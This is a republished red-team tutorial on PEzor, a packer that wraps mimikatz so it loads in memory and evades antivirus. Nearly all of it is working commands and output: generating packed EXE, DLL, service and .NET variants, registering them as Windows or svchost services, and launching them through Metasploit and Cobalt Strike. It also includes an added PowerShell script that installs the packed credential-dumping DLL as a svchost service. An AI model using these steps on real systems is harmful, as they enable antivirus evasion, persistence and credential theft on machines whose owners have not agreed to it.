This article is published with the authorization of 海阳顶端. It introduces a powerful tool, https://github.com/phra/PEzor, an open-source PE packer that wraps an EXE or shellcode so that it is loaded and executed reflectively in memory, with the goal of evading AV. In the examples below, the trailing -z 2 -p '...' arguments are passed through to the bundled donut; -p is the command line handed to the wrapped program (here mimikatz), and the output file is always named <input>.packed.<format suffix>.
$ git clone https://github.com/phra/PEzor.git
$ cd PEzor
$ sudo bash install.sh
$ bash PEzor.sh -h
# the install script drops its dependencies under the repo; adjust the paths if PEzor was not cloned to /home/kali/PEzor
export PATH=$PATH:~/go/bin/:/home/kali/PEzor:/home/kali/PEzor/deps/donut_v0.9.3/:/home/kali/PEzor/deps/wclang/_prefix_PEzor_/bin/
# generate
$ PEzor -format=exe mimikatz.exe -z 2 -p '"token::whoami" "exit"'
# execute
C:\> .\mimikatz.exe.packed.exe
# generate
$ PEzor -format=dll mimikatz.exe -z 2 -p '"token::whoami" "exit"'
# execute
C:\> rundll32 .\mimikatz.exe.packed.dll,DllMain
# generate
$ PEzor -format=service-exe mimikatz.exe -z 2 -p '"log C:/Users/Public/mimi.out" "coffee" "exit"'
# execute
C:\Users\Public> sc create mimiservice binpath= C:\Users\Public\mimikatz.exe.packed.service.exe
[SC] CreateService SUCCESS
C:UsersPublic> sc start mimiservice
SERVICE_NAME : mimiservice
TYPE : 20 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
PID : 913
FLAGS : 0x0
# generate
$ PEzor -format=service-dll mimikatz.exe -z 2 -p '"log C:/Users/Public/mimi.out" "coffee" "exit"'
# execute
C:\Users\Public> copy /y mimikatz.exe.packed.service.dll %SystemRoot%\System32\SvcHostDemo.dll
1 file(s) copied.
C:\Users\Public> sc create SvcHostDemo binpath= ^%SystemRoot^%"\System32\svchost -k mygroup" type= share start= demand
[SC] CreateService SUCCESS
C:\Users\Public> reg add "HKLM\SYSTEM\CurrentControlSet\services\SvcHostDemo\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d ^%SystemRoot^%\System32\SvcHostDemo.dll /f
The operation completed successfully.
C:\Users\Public> reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost" /v mygroup /t REG_MULTI_SZ /d SvcHostDemo /f
The operation completed successfully.
C:\Users\Public> sc start SvcHostDemo
SERVICE_NAME : SvcHostDemo
TYPE : 30 WIN32
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 1823
FLAGS : 0x0
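The service-dll steps above are easy to get subtly wrong (a missing Parameters key, a ServiceDll path that does not expand, a group value that does not list the service), and the only symptom is a 1053 timeout from the service control manager. The following PowerShell script is an added example, not part of PEzor or of the original article: it performs the same five steps from an elevated shell, verifies the registry state before starting the service, and can undo everything with -Remove. The path in $DllSource is an assumption about where the packed DLL was copied on the target; the service and group names are the ones used on this page.

```powershell
#Requires -RunAsAdministrator
# Added example, not part of PEzor or the original article: installs a PEzor
# service-dll into its own svchost group as the steps above do, but checks each
# step and can undo the change with -Remove. $DllSource is an assumption about
# where the packed DLL was copied to on the target.
param(
    [string]$DllSource   = 'C:\Users\Public\mimikatz.exe.packed.service.dll',
    [string]$ServiceName = 'SvcHostDemo',
    [string]$GroupName   = 'mygroup',
    [switch]$Remove
)
$ErrorActionPreference = 'Stop'
$dllTarget = Join-Path $env:SystemRoot "System32\$ServiceName.dll"
$svcKey    = "HKLM:\SYSTEM\CurrentControlSet\Services\$ServiceName"
$groupKey  = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost'

function Invoke-Checked([string]$Exe, [string[]]$Argv) {
    # sc.exe and reg.exe signal failure through the exit code, not an exception
    & $Exe @Argv | Out-Null
    if ($LASTEXITCODE -ne 0) {
        throw "$Exe $($Argv -join ' ') failed with exit code $LASTEXITCODE"
    }
}

if ($Remove) {
    if (Get-Service -Name $ServiceName -ErrorAction SilentlyContinue) {
        Stop-Service -Name $ServiceName -Force -ErrorAction SilentlyContinue
        Invoke-Checked 'sc.exe' @('delete', $ServiceName)
    }
    Remove-ItemProperty -Path $groupKey -Name $GroupName -ErrorAction SilentlyContinue
    Remove-Item -Path $dllTarget -Force -ErrorAction SilentlyContinue
    Write-Host "Removed service $ServiceName, svchost group '$GroupName' and $dllTarget"
    return
}

# 1. Stage the DLL under System32; svchost resolves it through the ServiceDll value set below.
Copy-Item -Path $DllSource -Destination $dllTarget -Force

# 2. Create a shared-process (type= share) service whose image is svchost running our own group.
Invoke-Checked 'sc.exe' @('create', $ServiceName,
    'binpath=', "$env:SystemRoot\System32\svchost.exe -k $GroupName",
    'type=', 'share', 'start=', 'demand')

# 3. Point the service at the DLL. REG_EXPAND_SZ so %SystemRoot% is expanded at load time.
New-Item -Path "$svcKey\Parameters" -Force | Out-Null
New-ItemProperty -Path "$svcKey\Parameters" -Name ServiceDll `
    -Value "%SystemRoot%\System32\$ServiceName.dll" -PropertyType ExpandString -Force | Out-Null

# 4. Register the group: "svchost -k mygroup" loads every service listed under this value.
New-ItemProperty -Path $groupKey -Name $GroupName `
    -Value ([string[]]@($ServiceName)) -PropertyType MultiString -Force | Out-Null

# 5. Sanity-check before starting: a wrong ServiceDll path or a missing group entry only
#    shows up later as error 1053 ("did not respond to the start request in a timely fashion").
$dll = (Get-ItemProperty -Path "$svcKey\Parameters").ServiceDll   # the registry provider expands %SystemRoot%
if (-not (Test-Path -LiteralPath $dll)) { throw "ServiceDll '$dll' is not on disk" }
if ((Get-ItemProperty -Path $groupKey).$GroupName -notcontains $ServiceName) {
    throw "svchost group '$GroupName' does not list $ServiceName"
}

# 6. Start it. Like 'sc start' above, this returns while the service is still START_PENDING;
#    mimikatz output goes to the file named in the -p "log ..." argument, not to the console.
Invoke-Checked 'sc.exe' @('start', $ServiceName)
Get-Service -Name $ServiceName | Format-List Name, Status, StartType
```

Run it once to install and start the service, and again with -Remove to delete the service, the group entry and the staged DLL (the log file written by the "log ..." parameter is left for you to collect first). sc.exe and reg.exe are used on purpose rather than New-Service, because New-Service cannot create a shared-process service or set the svchost group, which is exactly what this format relies on.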
# generate
$ PEzor -format=reflective-dll mimikatz.exe -z 2 -p '"log mimi.out" "coffee" "exit"'
# execute
msf5 > use post/windows/manage/reflective_dll_inject
msf5 post(windows/manage/reflective_dll_inject) > set PATH mimikatz.exe.packed.reflective.dll
msf5 post(windows/manage/reflective_dll_inject) > set WAIT 10
msf5 post(windows/manage/reflective_dll_inject) > run
# generate
$ PEzor -format=dotnet mimikatz.exe -z 2 -p '"log mimi.out" "coffee" "exit"'
# execute
msf5 > use post/windows/manage/execute_dotnet_assembly
msf5 post(windows/manage/execute_dotnet_assembly) > set DOTNET_EXE mimikatz.exe.packed.dotnet.exe
msf5 post(windows/manage/execute_dotnet_assembly) > set WAIT 10
msf5 post(windows/manage/execute_dotnet_assembly) > run
# convert and execute reflective DLL
beacon> execute-inmemory -format=reflective-dll mimikatz.exe -z 2 -p '"coffee" "exit"'
# convert and execute .NET assembly
beacon> execute-inmemory -format=dotnet mimikatz.exe -z 2 -p '"coffee" "exit"'
This article was first published on the WeChat public account LemonSec under the title "红队的最新一款绕过AV的PE工具" (A new PE tool for red teams to bypass AV).